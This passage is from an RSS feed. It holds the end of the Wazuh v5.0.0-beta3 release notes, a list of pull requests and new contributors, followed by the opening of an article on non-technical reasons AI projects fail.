<li>Fix incorrect snprintf size calculation in winevtchannel decoder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4750564321" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37198" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37198/hovercard" href="https://github.com/wazuh/wazuh/pull/37198">#37198</a></li>
<li>Align VD feed-download log levels with indexer consumer state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4750803257" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37199" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37199/hovercard" href="https://github.com/wazuh/wazuh/pull/37199">#37199</a></li>
<li>Recognize renamed indexer consumer status in engine sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4751474129" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37204" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37204/hovercard" href="https://github.com/wazuh/wazuh/pull/37204">#37204</a></li>
<li>Merge 4.14.6 into 4.14.7 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752903836" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37210" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37210/hovercard" href="https://github.com/wazuh/wazuh/pull/37210">#37210</a></li>
<li>Token replacement to avoid permission errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753550212" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37237" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37237/hovercard" href="https://github.com/wazuh/wazuh/pull/37237">#37237</a></li>
<li>Merge 4.14.7 into 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752941791" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37211" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37211/hovercard" href="https://github.com/wazuh/wazuh/pull/37211">#37211</a></li>
<li>Eliminate TOCTOU races in healthcheck file operations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736827470" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37160" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37160/hovercard" href="https://github.com/wazuh/wazuh/pull/37160">#37160</a></li>
<li>Sca file policy block standardization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Johnng007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Johnng007">@Johnng007</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4743999327" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37179" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37179/hovercard" href="https://github.com/wazuh/wazuh/pull/37179">#37179</a></li>
<li>Bind agent index selection and scope deletes by cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735319890" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37154" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37154/hovercard" href="https://github.com/wazuh/wazuh/pull/37154">#37154</a></li>
<li>Add Null Check for Inode and Dev Fields in FIM Whodata Event Handler by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4766388009" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37245" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37245/hovercard" href="https://github.com/wazuh/wazuh/pull/37245">#37245</a></li>
<li>Docs/6764 logcollector whats new 5.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721987109" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37056" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37056/hovercard" href="https://github.com/wazuh/wazuh/pull/37056">#37056</a></li>
<li>Repair RPM builder toolchain downloads by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728182443" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37130" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37130/hovercard" href="https://github.com/wazuh/wazuh/pull/37130">#37130</a></li>
<li>Add cluster name validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753677014" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37238" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37238/hovercard" href="https://github.com/wazuh/wazuh/pull/37238">#37238</a></li>
<li>Add cluster readiness endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728071822" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37129" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37129/hovercard" href="https://github.com/wazuh/wazuh/pull/37129">#37129</a></li>
<li>Defer cluster payload buffer allocation until data is received by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4769731908" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37280" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37280/hovercard" href="https://github.com/wazuh/wazuh/pull/37280">#37280</a></li>
<li>Indexer connector bulk size and flush interval configurable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736764012" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37158" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37158/hovercard" href="https://github.com/wazuh/wazuh/pull/37158">#37158</a></li>
<li>Enable shared-password enrollment by default by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4734529271" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37151" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37151/hovercard" href="https://github.com/wazuh/wazuh/pull/37151">#37151</a></li>
<li>Fix unit test workflow paths and report handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4777938328" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37317" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37317/hovercard" href="https://github.com/wazuh/wazuh/pull/37317">#37317</a></li>
<li>Migrate agent + server CI artifacts to S3 — 4.14.7 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643824078" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5300" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5300/hovercard" href="https://github.com/wazuh/wazuh/issues/5300">#5300</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643806955" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5298" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5298/hovercard" href="https://github.com/wazuh/wazuh/issues/5298">#5298</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4745105538" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37186" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37186/hovercard" href="https://github.com/wazuh/wazuh/pull/37186">#37186</a></li>
<li>Handle eol amazon inspector classic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746717311" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37194" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37194/hovercard" href="https://github.com/wazuh/wazuh/pull/37194">#37194</a></li>
<li>Fix wazuh-modulesd missing after macOS agent restart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4695257310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37020" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37020/hovercard" href="https://github.com/wazuh/wazuh/pull/37020">#37020</a></li>
<li>Fix test_worker failing unit test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4777598945" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37314" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37314/hovercard" href="https://github.com/wazuh/wazuh/pull/37314">#37314</a></li>
<li>Improve log messages  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671655779" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36876" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36876/hovercard" href="https://github.com/wazuh/wazuh/pull/36876">#36876</a></li>
<li>Improve changelog format by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4784576201" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37332" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37332/hovercard" href="https://github.com/wazuh/wazuh/pull/37332">#37332</a></li>
<li>Lower log level of transient cluster IPC failures (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768765565" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37277" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/37277/hovercard" href="https://github.com/wazuh/wazuh/issues/37277">#37277</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768737167" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37276" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/37276/hovercard" href="https://github.com/wazuh/wazuh/issues/37276">#37276</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4783970019" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37326" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37326/hovercard" href="https://github.com/wazuh/wazuh/pull/37326">#37326</a></li>
<li>Fix TypeError when sorting agents by version with empty version strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4779868587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37323" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37323/hovercard" href="https://github.com/wazuh/wazuh/pull/37323">#37323</a></li>
<li>Migrate agent + server CI artifacts to S3 — 5.0.0 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643824078" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5300" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5300/hovercard" href="https://github.com/wazuh/wazuh/issues/5300">#5300</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643806955" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5298" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5298/hovercard" href="https://github.com/wazuh/wazuh/issues/5298">#5298</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744978467" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37185" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37185/hovercard" href="https://github.com/wazuh/wazuh/pull/37185">#37185</a></li>
<li>Validate asset resource names before policy promotion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741678194" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37172" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37172/hovercard" href="https://github.com/wazuh/wazuh/pull/37172">#37172</a></li>
<li>Revert wazuh-server indexer credentials and propagate log context in indexer connector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4784669937" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37333" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37333/hovercard" href="https://github.com/wazuh/wazuh/pull/37333">#37333</a></li>
<li>Add VD readiness status HTTP endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753007421" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37213" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37213/hovercard" href="https://github.com/wazuh/wazuh/pull/37213">#37213</a></li>
<li>Use github.workspace for wodles report paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787326775" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37342" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37342/hovercard" href="https://github.com/wazuh/wazuh/pull/37342">#37342</a></li>
<li>Skip FIM whodata cases on the tier-2 Linux job (CodeBuild) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4771331061" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37291" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37291/hovercard" href="https://github.com/wazuh/wazuh/pull/37291">#37291</a></li>
<li>Migrate 4.x Windows test runners to AWS CodeBuild  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746542396" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37193" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37193/hovercard" href="https://github.com/wazuh/wazuh/pull/37193">#37193</a></li>
<li>Lower log level of transient queue send failures in modulesd by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788115193" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37345" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37345/hovercard" href="https://github.com/wazuh/wazuh/pull/37345">#37345</a></li>
<li>Add changelog check workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787529876" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37343" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37343/hovercard" href="https://github.com/wazuh/wazuh/pull/37343">#37343</a></li>
<li>Add changelog check workflow for 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788939423" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37351" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37351/hovercard" href="https://github.com/wazuh/wazuh/pull/37351">#37351</a></li>
<li>Retry <code>OS_SendUnix</code> on <code>ENOBUFS</code> to stop dropping binary sync messages on macOS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788850753" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37349" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37349/hovercard" href="https://github.com/wazuh/wazuh/pull/37349">#37349</a></li>
<li>change: Allow null root_decoder as alias of empty string on policy cr… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788261828" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37347" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37347/hovercard" href="https://github.com/wazuh/wazuh/pull/37347">#37347</a></li>
<li>Fix eBPF FIM whodata for Amazon Linux by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692775155" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37014" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37014/hovercard" href="https://github.com/wazuh/wazuh/pull/37014">#37014</a></li>
<li>Merge 4.14.6 into 4.14.7 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4792934428" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37358" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37358/hovercard" href="https://github.com/wazuh/wazuh/pull/37358">#37358</a></li>
<li>Bump 5.0.0 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4794415837" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37371" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37371/hovercard" href="https://github.com/wazuh/wazuh/pull/37371">#37371</a></li>
<li>Merge 4.14.7 into 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4793306985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37360" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37360/hovercard" href="https://github.com/wazuh/wazuh/pull/37360">#37360</a></li>
<li>Migrate remaining CI artifacts to S3 for the 5.0.0 branch (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="454578666" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/3502" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/3502/hovercard" href="https://github.com/wazuh/wazuh/pull/3502">#3502</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788864035" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37350" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37350/hovercard" href="https://github.com/wazuh/wazuh/pull/37350">#37350</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539151411" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36518" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36518/hovercard" href="https://github.com/wazuh/wazuh/pull/36518">#36518</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ripdiegozz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ripdiegozz">@Ripdiegozz</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505228985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36357" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36357/hovercard" href="https://github.com/wazuh/wazuh/pull/36357">#36357</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adman23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adman23">@Adman23</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580559348" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36750" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36750/hovercard" href="https://github.com/wazuh/wazuh/pull/36750">#36750</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jcorredor-spec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jcorredor-spec">@jcorredor-spec</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521476970" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36402" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36402/hovercard" href="https://github.com/wazuh/wazuh/pull/36402">#36402</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/wazuh/wazuh/compare/v5.0.0-beta2...v5.0.0-beta3"><tt>v5.0.0-beta2...v5.0.0-beta3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[4 reasons AI projects fail that have nothing to do with technology]]></title>
<description><![CDATA[Having worked with dozens of companies in various stages of AI adoption, I’ve had a front-row seat to the myriad reasons (and sometimes excuses) why AI projects fail to launch, fail to make it past pilots or fail to deliver business value and ROI.



While every organization’s circumstances are u...]]></description>
<link>https://tsecurity.de/de/3640730/it-nachrichten/4-reasons-ai-projects-fail-that-have-nothing-to-do-with-technology/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640730/it-nachrichten/4-reasons-ai-projects-fail-that-have-nothing-to-do-with-technology/</guid>
<pubDate>Thu, 02 Jul 2026 12:03:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Having worked with dozens of companies in various stages of AI adoption, I’ve had a front-row seat to the myriad reasons (and sometimes excuses) why AI projects fail to launch, fail to make it past pilots or <a href="https://complexdiscovery.com/why-95-of-corporate-ai-projects-fail-lessons-from-mits-2025-study/" rel="nofollow">fail to deliver</a> business value and ROI.</p>



